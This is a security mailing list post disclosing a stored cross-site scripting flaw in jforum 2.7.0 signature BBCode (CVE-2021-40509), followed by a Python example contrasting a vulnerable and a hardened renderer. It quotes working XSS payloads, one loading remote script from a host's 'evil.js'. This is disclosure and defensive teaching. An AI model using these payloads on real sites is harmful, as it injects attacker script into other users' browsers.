-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
> hi,
>
> I found a vulnerability in jforum 2.7.0. It is a stored cross-site
> scripting vulnerability. The place is the user's profile - signature. The
> technique of the vulnerability is the same as that described in this
> article "STORED CROSS SITE SCRIPTING IN BBCODE" (
> https://mindedsecurity.com/advisories/msa130510/), and the POC is:
>
> color tag:
> [color=red" onMouseOver="alert('xss')]XSS[/color]
> [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js');"]XSS[/color]
> Renders into HTML:
> <font onmouseover="alert('xss')" color="red">XSS</font>
> <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font>
>
> img tag:
> [img]/demo.jpg" onMouseOver="alert('xss')[/img]
> Renders into HTML:
> <img src="/demo.jpg" onmouseover="alert('xss')" alt="image">
>
> url= tag:
> [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url]
> Renders into HTML:
> <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a>
>
> Through analysis, the forum has set the cookie to HttpOnly, but the
> attacker can use $.getScript to do some evil things.
>
> This vulnerability has been fixed in
> https://sourceforge.net/p/jforum2/code/934/ .
>
> Timeline:
> 2021-04-21 announced to the developer of Jforum by e-mail
> 2021-04-22 Jforum fixed the vulnerability, and will include this fix in the
> next release
> 2021-09-02 sent this mail to bugtraq & fulldisclosure
CVE-2021-40509 has been assigned for this vulnerability.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509

- --
Henri Salo
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAmE3GGgACgkQJ633pE6q
dXRbUA//fgeWQCIQzYDgZ6venNplzRBsCamTVWK2miur4NjIqKFtza4namiEn1GK
9+Fw4llZdmcdLV2iE5HVo1EPwg1RKgKqEFWlat8cLNWyzPFazh3Mv8gJgAAPnfgB
HdODZGE8cXnTZ2nK1FZqTtGbh7vTcs9AlWzpEwZgZs+BzWzX6VO/gxC2iQcA4ePq
6/xKsUbO46SKZpZ+pZt45V9r4EcibgU69cXwtPeywE2NRjlM9VsReWz+p3CVR3Sv
px6mK3G4sjyHyPIhkDwVMwUziPT5FfLuAPYI6VEweMsCUgyUfj48xu+pmTYwCQ1R
8LSjllEU2qsGvs0oMGs7AEp5T1c/kDP7xgS761gUivjl1J//szu+QScC0jKYVdEX
DWp672UpzB3F4xsMTeQu7U7zq+NRS2ySNs3gB2cvqsjS8lDIMdrnThqZny/K7jhC
TCrfTYDTsej1jlMWR3mTiFIhNNhPPoSg+Opab1wnqQwO3JIE9xVqNNTsyIH+aCMK
jUlZZAbJwfb3WNJMJHI+9gxh1XgLf5NhgsSlzSpWcnM/soXOYzi3EdYlvuc0cTQ7
X3082dHC7A2Y1Lm9fTqvwsQ+BGV0rR8FxhwAfqweNz7AH5rAIbalj+mVFweSaUU/
k2Vd4Jt8QjfmzaTMMpLxUPjA3vlaIBxYnz/T33chZ119PRG9vNc=
=fWS4
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
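The bug class in the report above, as an added example that is not jforum's code and not its fix: a hypothetical regex-based BBCode renderer that pastes the tag parameter straight into an HTML attribute (so a `"` in the parameter closes the attribute and an `onMouseOver=` rides in after it), beside a hardened renderer that allow-lists each parameter and escapes it, and a parser-based check that reports whether an `on*` attribute actually ended up on an element. The three payloads are the report's PoCs; the regexes, allow-lists and function names are assumptions made for this example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs: the three PoCs from the report, verbatim.
POCS = {
    "color": "[color=red\" onMouseOver=\"alert('xss')]XSS[/color]",
    "img": "[img]/demo.jpg\" onMouseOver=\"alert('xss')[/img]",
    "url": "[url='http://www.demo.com\" onMouseOver=\"alert('xss')']test[/url]",
}

# Hypothetical tag grammar (an assumption, not jforum's parser).
COLOR_TAG = re.compile(r"\[color=(.+?)\](.*?)\[/color\]", re.S)
IMG_TAG = re.compile(r"\[img\](.+?)\[/img\]", re.S)
URL_TAG = re.compile(r"\[url='?(.+?)'?\](.*?)\[/url\]", re.S)


def render_naive(bbcode: str) -> str:
    """Vulnerable renderer: the captured parameter lands inside a double-quoted
    attribute untouched, so a parameter containing '"' terminates the attribute
    and the rest of the parameter becomes new attributes on the same element."""
    out = COLOR_TAG.sub(r'<font color="\1">\2</font>', bbcode)
    out = IMG_TAG.sub(r'<img src="\1" alt="image">', out)
    return URL_TAG.sub(r'<a href="\1" target="_blank">\2</a>', out)


# Allow-lists for what may appear in each attribute position (assumptions).
SAFE_COLOR = re.compile(r"^(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6})$")
SAFE_LINK = re.compile(r"^(?:https?://|/)[^\s\"'<>]*$")  # absolute http(s) or site-relative


def _attr(value: str) -> str:
    # Escape quotes and angle brackets so the value can never close its attribute.
    return html.escape(value, quote=True)


def render_hardened(bbcode: str) -> str:
    """Hardened renderer: validate the parameter before it reaches an attribute,
    escape it anyway, and emit a rejected tag as literal text rather than HTML."""
    def color(m):
        value, body = m.group(1), m.group(2)
        if not SAFE_COLOR.match(value):
            return html.escape(m.group(0))
        return f'<font color="{_attr(value)}">{html.escape(body)}</font>'

    def img(m):
        src = m.group(1)
        if not SAFE_LINK.match(src):
            return html.escape(m.group(0))
        return f'<img src="{_attr(src)}" alt="image">'

    def url(m):
        href, body = m.group(1), m.group(2)
        if not SAFE_LINK.match(href):
            return html.escape(m.group(0))
        return f'<a href="{_attr(href)}" target="_blank">{html.escape(body)}</a>'

    out = COLOR_TAG.sub(color, bbcode)
    out = IMG_TAG.sub(img, out)
    return URL_TAG.sub(url, out)


class _AttrCollector(HTMLParser):
    """Collects attribute names from start tags, the way a browser would see them."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name.lower() for name, _ in attrs)


def has_event_handler(rendered: str) -> bool:
    """True if any element in the rendered HTML carries an on* attribute.
    Parsing, rather than grepping for 'on...=', avoids flagging escaped text."""
    p = _AttrCollector()
    p.feed(rendered)
    p.close()
    return any(n.startswith("on") for n in p.names)


def audit(renderer) -> dict:
    """Run every PoC through a renderer; True means the handler survived."""
    return {name: has_event_handler(renderer(poc)) for name, poc in POCS.items()}


if __name__ == "__main__":
    for name, poc in POCS.items():
        print(f"{name:5} naive:    {render_naive(poc)}")
        print(f"{name:5} hardened: {render_hardened(poc)}")
    print("naive   ", audit(render_naive))
    print("hardened", audit(render_hardened))
```

Escaping alone is not enough for the `img` and `url` cases: a `javascript:` URL survives `html.escape` intact, which is why the hardened version restricts the scheme and the character set before escaping. Running the script shows each PoC rendered both ways; the naive output reproduces the `onmouseover` attributes quoted in the report, while the hardened output contains no element at all for the three payloads.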